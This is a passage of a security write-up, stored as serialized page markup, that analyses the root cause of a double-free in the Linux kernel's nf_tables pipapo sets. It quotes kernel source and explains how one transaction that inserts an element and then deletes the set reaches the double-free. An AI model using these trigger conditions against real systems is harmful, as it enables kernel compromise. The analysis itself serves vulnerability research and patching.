",{"type":24,"tag":301,"props":58091,"children":58092},{"style":385},[58093],{"type":30,"value":772},{"type":24,"tag":301,"props":58095,"children":58096},{"style":359},[58097],{"type":30,"value":58098},"e;\n",{"type":24,"tag":301,"props":58100,"children":58101},{"class":303,"line":592},[58102],{"type":24,"tag":301,"props":58103,"children":58104},{"emptyLinePlaceholder":16},[58105],{"type":30,"value":341},{"type":24,"tag":301,"props":58107,"children":58108},{"class":303,"line":619},[58109,58113,58117,58121,58125,58129,58133,58137,58141,58145,58149,58153,58158,58163,58167,58171,58175,58180,58184,58188,58192,58196,58201,58205],{"type":24,"tag":301,"props":58110,"children":58111},{"style":308},[58112],{"type":30,"value":38149},{"type":24,"tag":301,"props":58114,"children":58115},{"style":359},[58116],{"type":30,"value":58034},{"type":24,"tag":301,"props":58118,"children":58119},{"style":385},[58120],{"type":30,"value":1849},{"type":24,"tag":301,"props":58122,"children":58123},{"style":369},[58124],{"type":30,"value":39721},{"type":24,"tag":301,"props":58126,"children":58127},{"style":359},[58128],{"type":30,"value":882},{"type":24,"tag":301,"props":58130,"children":58131},{"style":369},[58132],{"type":30,"value":58064},{"type":24,"tag":301,"props":58134,"children":58135},{"style":385},[58136],{"type":30,"value":3407},{"type":24,"tag":301,"props":58138,"children":58139},{"style":466},[58140],{"type":30,"value":487},{"type":24,"tag":301,"props":58142,"children":58143},{"style":385},[58144],{"type":30,"value":20977},{"type":24,"tag":301,"props":58146,"children":58147},{"style":369},[58148],{"type":30,"value":39721},{"type":24,"tag":301,"props":58150,"children":58151},{"style":359},[58152],{"type":30,"value":882},{"type":24,"tag":301,"props":58154,"children":58155},{"style":369},[58156],{"type":30,"value":58157},"mt",{"type":24,"tag":301,"props":58159,"children":58160},{"style":359},[58161],{"type":30,"value":58162},"[r ",{"type":24,"tag":301,"props":58164,"children":58165},{"style":385},[58166],{"type":30,"value":11206},{"type":24,"tag":301,"props":58168,"children":58169},{"style":466},[58170],{"type":30,"value":487},{"type":24,"tag":301,"props":58172,"children":58173},{"style":359},[58174],{"type":30,"value":57079},{"type":24,"tag":301,"props":58176,"children":58177},{"style":369},[58178],{"type":30,"value":58179},"e",{"type":24,"tag":301,"props":58181,"children":58182},{"style":385},[58183],{"type":30,"value":2460},{"type":24,"tag":301,"props":58185,"children":58186},{"style":369},[58187],{"type":30,"value":39721},{"type":24,"tag":301,"props":58189,"children":58190},{"style":359},[58191],{"type":30,"value":882},{"type":24,"tag":301,"props":58193,"children":58194},{"style":369},[58195],{"type":30,"value":58157},{"type":24,"tag":301,"props":58197,"children":58198},{"style":359},[58199],{"type":30,"value":58200},"[r].",{"type":24,"tag":301,"props":58202,"children":58203},{"style":369},[58204],{"type":30,"value":58179},{"type":24,"tag":301,"props":58206,"children":58207},{"style":359},[58208],{"type":30,"value":791},{"type":24,"tag":301,"props":58210,"children":58211},{"class":303,"line":635},[58212,58217],{"type":24,"tag":301,"props":58213,"children":58214},{"style":308},[58215],{"type":30,"value":58216}," continue",{"type":24,"tag":301,"props":58218,"children":58219},{"style":359},[58220],{"type":30,"value":492},{"type":24,"tag":301,"props":58222,"children":58223},{"class":303,"line":643},[58224],{"type":24,"tag":301,"props":58225,"children":58226},{"emptyLinePlaceholder":16},[58227],{"type":30,"value":341},{"type":24,"tag":301,"props":58229,"children":58230},{"class":303,"line":652},[58231,58236,58240,58244,58248,58252,58256,58260],{"type":24,"tag":301,"props":58232,"children":58233},{"style":359},[58234],{"type":30,"value":58235}," e ",{"type":24,"tag":301,"props":58237,"children":58238},{"style":385},[58239],{"type":30,"value":523},{"type":24,"tag":301,"props":58241,"children":58242},{"style":369},[58243],{"type":30,"value":39721},{"type":24,"tag":301,"props":58245,"children":58246},{"style":359},[58247],{"type":30,"value":882},{"type":24,"tag":301,"props":58249,"children":58250},{"style":369},[58251],{"type":30,"value":58157},{"type":24,"tag":301,"props":58253,"children":58254},{"style":359},[58255],{"type":30,"value":58200},{"type":24,"tag":301,"props":58257,"children":58258},{"style":369},[58259],{"type":30,"value":58179},{"type":24,"tag":301,"props":58261,"children":58262},{"style":359},[58263],{"type":30,"value":492},{"type":24,"tag":301,"props":58265,"children":58266},{"class":303,"line":666},[58267],{"type":24,"tag":301,"props":58268,"children":58269},{"emptyLinePlaceholder":16},[58270],{"type":30,"value":341},{"type":24,"tag":301,"props":58272,"children":58273},{"class":303,"line":674},[58274,58279,58284,58288,58292,58296,58301],{"type":24,"tag":301,"props":58275,"children":58276},{"style":314},[58277],{"type":30,"value":58278}," nf_tables_set_elem_destroy",{"type":24,"tag":301,"props":58280,"children":58281},{"style":359},[58282],{"type":30,"value":58283},"(ctx, set, ",{"type":24,"tag":301,"props":58285,"children":58286},{"style":385},[58287],{"type":30,"value":556},{"type":24,"tag":301,"props":58289,"children":58290},{"style":369},[58291],{"type":30,"value":58179},{"type":24,"tag":301,"props":58293,"children":58294},{"style":359},[58295],{"type":30,"value":882},{"type":24,"tag":301,"props":58297,"children":58298},{"style":369},[58299],{"type":30,"value":58300},"priv",{"type":24,"tag":301,"props":58302,"children":58303},{"style":359},[58304],{"type":30,"value":589},{"type":24,"tag":301,"props":58306,"children":58307},{"class":303,"line":692},[58308],{"type":24,"tag":301,"props":58309,"children":58310},{"style":359},[58311],{"type":30,"value":16401},{"type":24,"tag":301,"props":58313,"children":58314},{"class":303,"line":3631},[58315],{"type":24,"tag":301,"props":58316,"children":58317},{"style":359},[58318],{"type":30,"value":698},{"type":24,"tag":32,"props":58320,"children":58321},{},[58322,58324,58330,58332,58337],{"type":30,"value":58323},"Which will then ",{"type":24,"tag":145,"props":58325,"children":58327},{"className":58326},[],[58328],{"type":30,"value":58329},"kfree()",{"type":30,"value":58331}," the ",{"type":24,"tag":145,"props":58333,"children":58335},{"className":58334},[],[58336],{"type":30,"value":57741},{"type":30,"value":206},{"type":24,"tag":291,"props":58339,"children":58341},{"className":295,"code":58340,"language":294,"meta":7,"style":7},"void nf_tables_set_elem_destroy(const struct nft_ctx *ctx,\n const struct nft_set *set,\n const struct nft_elem_priv *elem_priv)\n{\n struct nft_set_ext *ext = nft_set_elem_ext(set, elem_priv);\n\n if (nft_set_ext_exists(ext, NFT_SET_EXT_EXPRESSIONS))\n nft_set_elem_expr_destroy(ctx, nft_set_ext_expr(ext));\n\n kfree(elem_priv);\n}\n",[58342],{"type":24,"tag":145,"props":58343,"children":58344},{"__ignoreMap":7},[58345,58386,58414,58443,58450,58485,58492,58513,58536,58543,58556],{"type":24,"tag":301,"props":58346,"children":58347},{"class":303,"line":304},[58348,58353,58358,58362,58366,58370,58374,58378,58382],{"type":24,"tag":301,"props":58349,"children":58350},{"style":348},[58351],{"type":30,"value":58352},"void",{"type":24,"tag":301,"props":58354,"children":58355},{"style":314},[58356],{"type":30,"value":58357}," nf_tables_set_elem_destroy",{"type":24,"tag":301,"props":58359,"children":58360},{"style":359},[58361],{"type":30,"value":362},{"type":24,"tag":301,"props":58363,"children":58364},{"style":348},[58365],{"type":30,"value":16460},{"type":24,"tag":301,"props":58367,"children":58368},{"style":348},[58369],{"type":30,"value":27920},{"type":24,"tag":301,"props":58371,"children":58372},{"style":359},[58373],{"type":30,"value":57799},{"type":24,"tag":301,"props":58375,"children":58376},{"style":385},[58377],{"type":30,"value":772},{"type":24,"tag":301,"props":58379,"children":58380},{"style":369},[58381],{"type":30,"value":27051},{"type":24,"tag":301,"props":58383,"children":58384},{"style":359},[58385],{"type":30,"value":1729},{"type":24,"tag":301,"props":58387,"children":58388},{"class":303,"line":320},[58389,58394,58398,58402,58406,58410],{"type":24,"tag":301,"props":58390,"children":58391},{"style":348},[58392],{"type":30,"value":58393}," const",{"type":24,"tag":301,"props":58395,"children":58396},{"style":348},[58397],{"type":30,"value":27920},{"type":24,"tag":301,"props":58399,"children":58400},{"style":359},[58401],{"type":30,"value":57827},{"type":24,"tag":301,"props":58403,"children":58404},{"style":385},[58405],{"type":30,"value":772},{"type":24,"tag":301,"props":58407,"children":58408},{"style":369},[58409],{"type":30,"value":57749},{"type":24,"tag":301,"props":58411,"children":58412},{"style":359},[58413],{"type":30,"value":1729},{"type":24,"tag":301,"props":58415,"children":58416},{"class":303,"line":335},[58417,58421,58425,58430,58434,58439],{"type":24,"tag":301,"props":58418,"children":58419},{"style":348},[58420],{"type":30,"value":58393},{"type":24,"tag":301,"props":58422,"children":58423},{"style":348},[58424],{"type":30,"value":27920},{"type":24,"tag":301,"props":58426,"children":58427},{"style":359},[58428],{"type":30,"value":58429}," nft_elem_priv ",{"type":24,"tag":301,"props":58431,"children":58432},{"style":385},[58433],{"type":30,"value":772},{"type":24,"tag":301,"props":58435,"children":58436},{"style":369},[58437],{"type":30,"value":58438},"elem_priv",{"type":24,"tag":301,"props":58440,"children":58441},{"style":359},[58442],{"type":30,"value":791},{"type":24,"tag":301,"props":58444,"children":58445},{"class":303,"line":344},[58446],{"type":24,"tag":301,"props":58447,"children":58448},{"style":359},[58449],{"type":30,"value":799},{"type":24,"tag":301,"props":58451,"children":58452},{"class":303,"line":401},[58453,58457,58462,58466,58471,58475,58480],{"type":24,"tag":301,"props":58454,"children":58455},{"style":348},[58456],{"type":30,"value":27920},{"type":24,"tag":301,"props":58458,"children":58459},{"style":359},[58460],{"type":30,"value":58461}," nft_set_ext ",{"type":24,"tag":301,"props":58463,"children":58464},{"style":385},[58465],{"type":30,"value":772},{"type":24,"tag":301,"props":58467,"children":58468},{"style":359},[58469],{"type":30,"value":58470},"ext ",{"type":24,"tag":301,"props":58472,"children":58473},{"style":385},[58474],{"type":30,"value":523},{"type":24,"tag":301,"props":58476,"children":58477},{"style":314},[58478],{"type":30,"value":58479}," nft_set_elem_ext",{"type":24,"tag":301,"props":58481,"children":58482},{"style":359},[58483],{"type":30,"value":58484},"(set, elem_priv);\n",{"type":24,"tag":301,"props":58486,"children":58487},{"class":303,"line":415},[58488],{"type":24,"tag":301,"props":58489,"children":58490},{"emptyLinePlaceholder":16},[58491],{"type":30,"value":341},{"type":24,"tag":301,"props":58493,"children":58494},{"class":303,"line":439},[58495,58499,58503,58508],{"type":24,"tag":301,"props":58496,"children":58497},{"style":308},[58498],{"type":30,"value":22574},{"type":24,"tag":301,"props":58500,"children":58501},{"style":359},[58502],{"type":30,"value":873},{"type":24,"tag":301,"props":58504,"children":58505},{"style":314},[58506],{"type":30,"value":58507},"nft_set_ext_exists",{"type":24,"tag":301,"props":58509,"children":58510},{"style":359},[58511],{"type":30,"value":58512},"(ext, NFT_SET_EXT_EXPRESSIONS))\n",{"type":24,"tag":301,"props":58514,"children":58515},{"class":303,"line":447},[58516,58521,58526,58531],{"type":24,"tag":301,"props":58517,"children":58518},{"style":314},[58519],{"type":30,"value":58520}," nft_set_elem_expr_destroy",{"type":24,"tag":301,"props":58522,"children":58523},{"style":359},[58524],{"type":30,"value":58525},"(ctx, ",{"type":24,"tag":301,"props":58527,"children":58528},{"style":314},[58529],{"type":30,"value":58530},"nft_set_ext_expr",{"type":24,"tag":301,"props":58532,"children":58533},{"style":359},[58534],{"type":30,"value":58535},"(ext));\n",{"type":24,"tag":301,"props":58537,"children":58538},{"class":303,"line":476},[58539],{"type":24,"tag":301,"props":58540,"children":58541},{"emptyLinePlaceholder":16},[58542],{"type":30,"value":341},{"type":24,"tag":301,"props":58544,"children":58545},{"class":303,"line":495},[58546,58551],{"type":24,"tag":301,"props":58547,"children":58548},{"style":314},[58549],{"type":30,"value":58550}," kfree",{"type":24,"tag":301,"props":58552,"children":58553},{"style":359},[58554],{"type":30,"value":58555},"(elem_priv);\n",{"type":24,"tag":301,"props":58557,"children":58558},{"class":303,"line":504},[58559],{"type":24,"tag":301,"props":58560,"children":58561},{"style":359},[58562],{"type":30,"value":698},{"type":24,"tag":32,"props":58564,"children":58565},{},[58566,58567,58573,58575,58580,58582,58587,58589,58594,58595,58600,58602,58607,58609,58614,58616,58621],{"type":30,"value":8079},{"type":24,"tag":145,"props":58568,"children":58570},{"className":58569},[],[58571],{"type":30,"value":58572},"nft_pipapo_match",{"type":30,"value":58574}," objects contain views of the ",{"type":24,"tag":145,"props":58576,"children":58578},{"className":58577},[],[58579],{"type":30,"value":57741},{"type":30,"value":58581},"'s of a ",{"type":24,"tag":145,"props":58583,"children":58585},{"className":58584},[],[58586],{"type":30,"value":57749},{"type":30,"value":58588},". The difference between the ",{"type":24,"tag":145,"props":58590,"children":58592},{"className":58591},[],[58593],{"type":30,"value":57726},{"type":30,"value":2378},{"type":24,"tag":145,"props":58596,"children":58598},{"className":58597},[],[58599],{"type":30,"value":57710},{"type":30,"value":58601}," match objects is that the clone has a view of not only already committed ",{"type":24,"tag":145,"props":58603,"children":58605},{"className":58604},[],[58606],{"type":30,"value":57741},{"type":30,"value":58608},"'s that the \"normal\" one has but also a view of the ",{"type":24,"tag":145,"props":58610,"children":58612},{"className":58611},[],[58613],{"type":30,"value":57741},{"type":30,"value":58615},"'s that was still not committed that only exists in the current control-plane. In other words, the control plane makes changes to the clone, and if the commit path is reached, the changes are committed to ",{"type":24,"tag":145,"props":58617,"children":58619},{"className":58618},[],[58620],{"type":30,"value":57726},{"type":30,"value":206},{"type":24,"tag":80,"props":58623,"children":58625},{"id":58624},"root-cause-analysis",[58626],{"type":30,"value":58627},"Root-cause analysis",{"type":24,"tag":32,"props":58629,"children":58630},{},[58631,58633,58639,58641,58646],{"type":30,"value":58632},"So ",{"type":24,"tag":145,"props":58634,"children":58636},{"className":58635},[],[58637],{"type":30,"value":58638},"nf_tables_set_elem_destroy",{"type":30,"value":58640}," being called for both match objects seems like a pretty straightforward double-free of the ",{"type":24,"tag":145,"props":58642,"children":58644},{"className":58643},[],[58645],{"type":30,"value":57741},{"type":30,"value":58647},"s that had already been committed since those will have duplicated views. At first glance, this is some bizarre-looking code. How did this bug come to be? How was it not detected before? Let's try to get to the bottom of it.",{"type":24,"tag":32,"props":58649,"children":58650},{},[58651,58653,58658,58660,58665,58667,58672,58674,58679,58681,58686],{"type":30,"value":58652},"We should now try to understand how to reach that path with the ",{"type":24,"tag":145,"props":58654,"children":58656},{"className":58655},[],[58657],{"type":30,"value":57703},{"type":30,"value":58659}," flag set, which is a member of the private data of a pipapo ",{"type":24,"tag":145,"props":58661,"children":58663},{"className":58662},[],[58664],{"type":30,"value":57741},{"type":30,"value":58666}," that becomes true whenever a change is made to the ",{"type":24,"tag":145,"props":58668,"children":58670},{"className":58669},[],[58671],{"type":30,"value":57749},{"type":30,"value":58673}," during the control-plane pass of a transaction. This is to tell the commit path that this ",{"type":24,"tag":145,"props":58675,"children":58677},{"className":58676},[],[58678],{"type":30,"value":57749},{"type":30,"value":58680}," has changes that have to be committed. If we refer to the code, we see that we can make the ",{"type":24,"tag":145,"props":58682,"children":58684},{"className":58683},[],[58685],{"type":30,"value":57749},{"type":30,"value":58687}," dirty by inserting a new element.",{"type":24,"tag":291,"props":58689,"children":58691},{"className":295,"code":58690,"language":294,"meta":7,"style":7},"static int nft_pipapo_insert(const struct net *net, const struct nft_set *set,\n const struct nft_set_elem *elem,\n struct nft_elem_priv **elem_priv)\n{\n[...]\n priv->dirty = true;\n[...]\n}\n",[58692],{"type":24,"tag":145,"props":58693,"children":58694},{"__ignoreMap":7},[58695,58765,58794,58819,58826,58833,58862,58869],{"type":24,"tag":301,"props":58696,"children":58697},{"class":303,"line":304},[58698,58702,58706,58711,58715,58719,58723,58728,58732,58737,58741,58745,58749,58753,58757,58761],{"type":24,"tag":301,"props":58699,"children":58700},{"style":348},[58701],{"type":30,"value":752},{"type":24,"tag":301,"props":58703,"children":58704},{"style":348},[58705],{"type":30,"value":57901},{"type":24,"tag":301,"props":58707,"children":58708},{"style":314},[58709],{"type":30,"value":58710}," nft_pipapo_insert",{"type":24,"tag":301,"props":58712,"children":58713},{"style":359},[58714],{"type":30,"value":362},{"type":24,"tag":301,"props":58716,"children":58717},{"style":348},[58718],{"type":30,"value":16460},{"type":24,"tag":301,"props":58720,"children":58721},{"style":348},[58722],{"type":30,"value":27920},{"type":24,"tag":301,"props":58724,"children":58725},{"style":359},[58726],{"type":30,"value":58727}," net ",{"type":24,"tag":301,"props":58729,"children":58730},{"style":385},[58731],{"type":30,"value":772},{"type":24,"tag":301,"props":58733,"children":58734},{"style":369},[58735],{"type":30,"value":58736},"net",{"type":24,"tag":301,"props":58738,"children":58739},{"style":359},[58740],{"type":30,"value":377},{"type":24,"tag":301,"props":58742,"children":58743},{"style":348},[58744],{"type":30,"value":16460},{"type":24,"tag":301,"props":58746,"children":58747},{"style":348},[58748],{"type":30,"value":27920},{"type":24,"tag":301,"props":58750,"children":58751},{"style":359},[58752],{"type":30,"value":57827},{"type":24,"tag":301,"props":58754,"children":58755},{"style":385},[58756],{"type":30,"value":772},{"type":24,"tag":301,"props":58758,"children":58759},{"style":369},[58760],{"type":30,"value":57749},{"type":24,"tag":301,"props":58762,"children":58763},{"style":359},[58764],{"type":30,"value":1729},{"type":24,"tag":301,"props":58766,"children":58767},{"class":303,"line":320},[58768,58772,58776,58781,58785,58790],{"type":24,"tag":301,"props":58769,"children":58770},{"style":348},[58771],{"type":30,"value":39651},{"type":24,"tag":301,"props":58773,"children":58774},{"style":348},[58775],{"type":30,"value":27920},{"type":24,"tag":301,"props":58777,"children":58778},{"style":359},[58779],{"type":30,"value":58780}," nft_set_elem ",{"type":24,"tag":301,"props":58782,"children":58783},{"style":385},[58784],{"type":30,"value":772},{"type":24,"tag":301,"props":58786,"children":58787},{"style":369},[58788],{"type":30,"value":58789},"elem",{"type":24,"tag":301,"props":58791,"children":58792},{"style":359},[58793],{"type":30,"value":1729},{"type":24,"tag":301,"props":58795,"children":58796},{"class":303,"line":335},[58797,58802,58806,58811,58815],{"type":24,"tag":301,"props":58798,"children":58799},{"style":348},[58800],{"type":30,"value":58801}," struct",{"type":24,"tag":301,"props":58803,"children":58804},{"style":359},[58805],{"type":30,"value":58429},{"type":24,"tag":301,"props":58807,"children":58808},{"style":385},[58809],{"type":30,"value":58810},"**",{"type":24,"tag":301,"props":58812,"children":58813},{"style":369},[58814],{"type":30,"value":58438},{"type":24,"tag":301,"props":58816,"children":58817},{"style":359},[58818],{"type":30,"value":791},{"type":24,"tag":301,"props":58820,"children":58821},{"class":303,"line":344},[58822],{"type":24,"tag":301,"props":58823,"children":58824},{"style":359},[58825],{"type":30,"value":799},{"type":24,"tag":301,"props":58827,"children":58828},{"class":303,"line":401},[58829],{"type":24,"tag":301,"props":58830,"children":58831},{"style":359},[58832],{"type":30,"value":17123},{"type":24,"tag":301,"props":58834,"children":58835},{"class":303,"line":415},[58836,58841,58845,58850,58854,58858],{"type":24,"tag":301,"props":58837,"children":58838},{"style":369},[58839],{"type":30,"value":58840}," priv",{"type":24,"tag":301,"props":58842,"children":58843},{"style":359},[58844],{"type":30,"value":882},{"type":24,"tag":301,"props":58846,"children":58847},{"style":369},[58848],{"type":30,"value":58849},"dirty",{"type":24,"tag":301,"props":58851,"children":58852},{"style":385},[58853],{"type":30,"value":2537},{"type":24,"tag":301,"props":58855,"children":58856},{"style":348},[58857],{"type":30,"value":3440},{"type":24,"tag":301,"props":58859,"children":58860},{"style":359},[58861],{"type":30,"value":492},{"type":24,"tag":301,"props":58863,"children":58864},{"class":303,"line":439},[58865],{"type":24,"tag":301,"props":58866,"children":58867},{"style":359},[58868],{"type":30,"value":17123},{"type":24,"tag":301,"props":58870,"children":58871},{"class":303,"line":447},[58872],{"type":24,"tag":301,"props":58873,"children":58874},{"style":359},[58875],{"type":30,"value":698},{"type":24,"tag":32,"props":58877,"children":58878},{},[58879],{"type":30,"value":58880},"We also see that when the changes are commited, this flag is then unset.",{"type":24,"tag":291,"props":58882,"children":58884},{"className":295,"code":58883,"language":294,"meta":7,"style":7},"static void nft_pipapo_commit(struct nft_set *set)\n{\n[...]\n if (!priv->dirty)\n return;\n[...]\n priv->dirty = false;\n[...]\n}\n",[58885],{"type":24,"tag":145,"props":58886,"children":58887},{"__ignoreMap":7},[58888,58928,58935,58942,58973,58984,58991,59018,59025],{"type":24,"tag":301,"props":58889,"children":58890},{"class":303,"line":304},[58891,58895,58899,58904,58908,58912,58916,58920,58924],{"type":24,"tag":301,"props":58892,"children":58893},{"style":348},[58894],{"type":30,"value":752},{"type":24,"tag":301,"props":58896,"children":58897},{"style":348},[58898],{"type":30,"value":757},{"type":24,"tag":301,"props":58900,"children":58901},{"style":314},[58902],{"type":30,"value":58903}," nft_pipapo_commit",{"type":24,"tag":301,"props":58905,"children":58906},{"style":359},[58907],{"type":30,"value":362},{"type":24,"tag":301,"props":58909,"children":58910},{"style":348},[58911],{"type":30,"value":3010},{"type":24,"tag":301,"props":58913,"children":58914},{"style":359},[58915],{"type":30,"value":57827},{"type":24,"tag":301,"props":58917,"children":58918},{"style":385},[58919],{"type":30,"value":772},{"type":24,"tag":301,"props":58921,"children":58922},{"style":369},[58923],{"type":30,"value":57749},{"type":24,"tag":301,"props":58925,"children":58926},{"style":359},[58927],{"type":30,"value":791},{"type":24,"tag":301,"props":58929,"children":58930},{"class":303,"line":320},[58931],{"type":24,"tag":301,"props":58932,"children":58933},{"style":359},[58934],{"type":30,"value":799},{"type":24,"tag":301,"props":58936,"children":58937},{"class":303,"line":335},[58938],{"type":24,"tag":301,"props":58939,"children":58940},{"style":359},[58941],{"type":30,"value":17123},{"type":24,"tag":301,"props":58943,"children":58944},{"class":303,"line":344},[58945,58949,58953,58957,58961,58965,58969],{"type":24,"tag":301,"props":58946,"children":58947},{"style":308},[58948],{"type":30,"value":22574},{"type":24,"tag":301,"props":58950,"children":58951},{"style":359},[58952],{"type":30,"value":873},{"type":24,"tag":301,"props":58954,"children":58955},{"style":385},[58956],{"type":30,"value":2485},{"type":24,"tag":301,"props":58958,"children":58959},{"style":369},[58960],{"type":30,"value":58300},{"type":24,"tag":301,"props":58962,"children":58963},{"style":359},[58964],{"type":30,"value":882},{"type":24,"tag":301,"props":58966,"children":58967},{"style":369},[58968],{"type":30,"value":58849},{"type":24,"tag":301,"props":58970,"children":58971},{"style":359},[58972],{"type":30,"value":791},{"type":24,"tag":301,"props":58974,"children":58975},{"class":303,"line":401},[58976,58980],{"type":24,"tag":301,"props":58977,"children":58978},{"style":308},[58979],{"type":30,"value":45936},{"type":24,"tag":301,"props":58981,"children":58982},{"style":359},[58983],{"type":30,"value":492},{"type":24,"tag":301,"props":58985,"children":58986},{"class":303,"line":415},[58987],{"type":24,"tag":301,"props":58988,"children":58989},{"style":359},[58990],{"type":30,"value":17123},{"type":24,"tag":301,"props":58992,"children":58993},{"class":303,"line":439},[58994,58998,59002,59006,59010,59014],{"type":24,"tag":301,"props":58995,"children":58996},{"style":369},[58997],{"type":30,"value":58840},{"type":24,"tag":301,"props":58999,"children":59000},{"style":359},[59001],{"type":30,"value":882},{"type":24,"tag":301,"props":59003,"children":59004},{"style":369},[59005],{"type":30,"value":58849},{"type":24,"tag":301,"props":59007,"children":59008},{"style":385},[59009],{"type":30,"value":2537},{"type":24,"tag":301,"props":59011,"children":59012},{"style":348},[59013],{"type":30,"value":3613},{"type":24,"tag":301,"props":59015,"children":59016},{"style":359},[59017],{"type":30,"value":492},{"type":24,"tag":301,"props":59019,"children":59020},{"class":303,"line":447},[59021],{"type":24,"tag":301,"props":59022,"children":59023},{"style":359},[59024],{"type":30,"value":17123},{"type":24,"tag":301,"props":59026,"children":59027},{"class":303,"line":476},[59028],{"type":24,"tag":301,"props":59029,"children":59030},{"style":359},[59031],{"type":30,"value":698},{"type":24,"tag":32,"props":59033,"children":59034},{},[59035,59037,59042,59044,59049,59051,59056,59058,59063,59065,59071,59073,59079,59081,59086],{"type":30,"value":59036},"We can conclude that as long as we can, in the same transaction, insert a ",{"type":24,"tag":145,"props":59038,"children":59040},{"className":59039},[],[59041],{"type":30,"value":57741},{"type":30,"value":59043}," in the ",{"type":24,"tag":145,"props":59045,"children":59047},{"className":59046},[],[59048],{"type":30,"value":57749},{"type":30,"value":59050}," to make it dirty and then delete the ",{"type":24,"tag":145,"props":59052,"children":59054},{"className":59053},[],[59055],{"type":30,"value":57749},{"type":30,"value":59057},", we will be able to trigger the double-free. But there is another condition: in the commit path, if a ",{"type":24,"tag":145,"props":59059,"children":59061},{"className":59060},[],[59062],{"type":30,"value":57749},{"type":30,"value":59064},"'s ",{"type":24,"tag":145,"props":59066,"children":59068},{"className":59067},[],[59069],{"type":30,"value":59070},"->commit()",{"type":30,"value":59072}," method is executed before its ",{"type":24,"tag":145,"props":59074,"children":59076},{"className":59075},[],[59077],{"type":30,"value":59078},"->destroy()",{"type":30,"value":59080}," method, then the ",{"type":24,"tag":145,"props":59082,"children":59084},{"className":59083},[],[59085],{"type":30,"value":58849},{"type":30,"value":59087}," flag will be unset, and we won't be able to trigger the double-free.",{"type":24,"tag":32,"props":59089,"children":59090},{},[59091],{"type":30,"value":59092},"Let's once again refer to the code and see how these methods are called.",{"type":24,"tag":291,"props":59094,"children":59096},{"className":295,"code":59095,"language":294,"meta":7,"style":7},"static int nf_tables_commit(struct net *net, struct sk_buff *skb)\n{\n[...]\n case NFT_MSG_DELSET:\n case NFT_MSG_DESTROYSET: // [1]\n nft_trans_set(trans)->dead = 1; // [2]\n list_del_rcu(&nft_trans_set(trans)->list);\n nf_tables_set_notify(&trans->ctx, nft_trans_set(trans),\n trans->msg_type, GFP_KERNEL);\n break;\n case NFT_MSG_NEWSETELEM: // [3]\n[...]\n if (te->set->ops->commit &&\n list_empty(&te->set->pending_update)) {\n list_add_tail(&te->set->pending_update,\n &set_update_list);\n }\n[...]\n }\n\n nft_set_commit_update(&set_update_list);\n[...]\n nf_tables_commit_release(net);\n\n return 0;\n}\n",[59097],{"type":24,"tag":145,"props":59098,"children":59099},{"__ignoreMap":7},[59100,59162,59169,59176,59184,59197,59232,59266,59308,59330,59342,59355,59362,59409,59450,59490,59503,59510,59517,59524,59531,59556,59563,59576,59583,59599],{"type":24,"tag":301,"props":59101,"children":59102},{"class":303,"line":304},[59103,59107,59111,59116,59120,59124,59128,59132,59136,59140,59144,59149,59153,59158],{"type":24,"tag":301,"props":59104,"children":59105},{"style":348},[59106],{"type":30,"value":752},{"type":24,"tag":301,"props":59108,"children":59109},{"style":348},[59110],{"type":30,"value":57901},{"type":24,"tag":301,"props":59112,"children":59113},{"style":314},[59114],{"type":30,"value":59115}," nf_tables_commit",{"type":24,"tag":301,"props":59117,"children":59118},{"style":359},[59119],{"type":30,"value":362},{"type":24,"tag":301,"props":59121,"children":59122},{"style":348},[59123],{"type":30,"value":3010},{"type":24,"tag":301,"props":59125,"children":59126},{"style":359},[59127],{"type":30,"value":58727},{"type":24,"tag":301,"props":59129,"children":59130},{"style":385},[59131],{"type":30,"value":772},{"type":24,"tag":301,"props":59133,"children":59134},{"style":369},[59135],{"type":30,"value":58736},{"type":24,"tag":301,"props":59137,"children":59138},{"style":359},[59139],{"type":30,"value":377},{"type":24,"tag":301,"props":59141,"children":59142},{"style":348},[59143],{"type":30,"value":3010},{"type":24,"tag":301,"props":59145,"children":59146},{"style":359},[59147],{"type":30,"value":59148}," sk_buff ",{"type":24,"tag":301,"props":59150,"children":59151},{"style":385},[59152],{"type":30,"value":772},{"type":24,"tag":301,"props":59154,"children":59155},{"style":369},[59156],{"type":30,"value":59157},"skb",{"type":24,"tag":301,"props":59159,"children":59160},{"style":359},[59161],{"type":30,"value":791},{"type":24,"tag":301,"props":59163,"children":59164},{"class":303,"line":320},[59165],{"type":24,"tag":301,"props":59166,"children":59167},{"style":359},[59168],{"type":30,"value":799},{"type":24,"tag":301,"props":59170,"children":59171},{"class":303,"line":335},[59172],{"type":24,"tag":301,"props":59173,"children":59174},{"style":359},[59175],{"type":30,"value":17123},{"type":24,"tag":301,"props":59177,"children":59178},{"class":303,"line":344},[59179],{"type":24,"tag":301,"props":59180,"children":59181},{"style":359},[59182],{"type":30,"value":59183}," case NFT_MSG_DELSET:\n",{"type":24,"tag":301,"props":59185,"children":59186},{"class":303,"line":401},[59187,59192],{"type":24,"tag":301,"props":59188,"children":59189},{"style":359},[59190],{"type":30,"value":59191}," case NFT_MSG_DESTROYSET:",{"type":24,"tag":301,"props":59193,"children":59194},{"style":1062},[59195],{"type":30,"value":59196}," // [1]\n",{"type":24,"tag":301,"props":59198,"children":59199},{"class":303,"line":415},[59200,59205,59210,59215,59219,59223,59227],{"type":24,"tag":301,"props":59201,"children":59202},{"style":314},[59203],{"type":30,"value":59204}," nft_trans_set",{"type":24,"tag":301,"props":59206,"children":59207},{"style":359},[59208],{"type":30,"value":59209},"(trans)->",{"type":24,"tag":301,"props":59211,"children":59212},{"style":369},[59213],{"type":30,"value":59214},"dead",{"type":24,"tag":301,"props":59216,"children":59217},{"style":385},[59218],{"type":30,"value":2537},{"type":24,"tag":301,"props":59220,"children":59221},{"style":466},[59222],{"type":30,"value":487},{"type":24,"tag":301,"props":59224,"children":59225},{"style":359},[59226],{"type":30,"value":1059},{"type":24,"tag":301,"props":59228,"children":59229},{"style":1062},[59230],{"type":30,"value":59231}," // [2]\n",{"type":24,"tag":301,"props":59233,"children":59234},{"class":303,"line":439},[59235,59240,59244,59248,59253,59257,59262],{"type":24,"tag":301,"props":59236,"children":59237},{"style":314},[59238],{"type":30,"value":59239}," 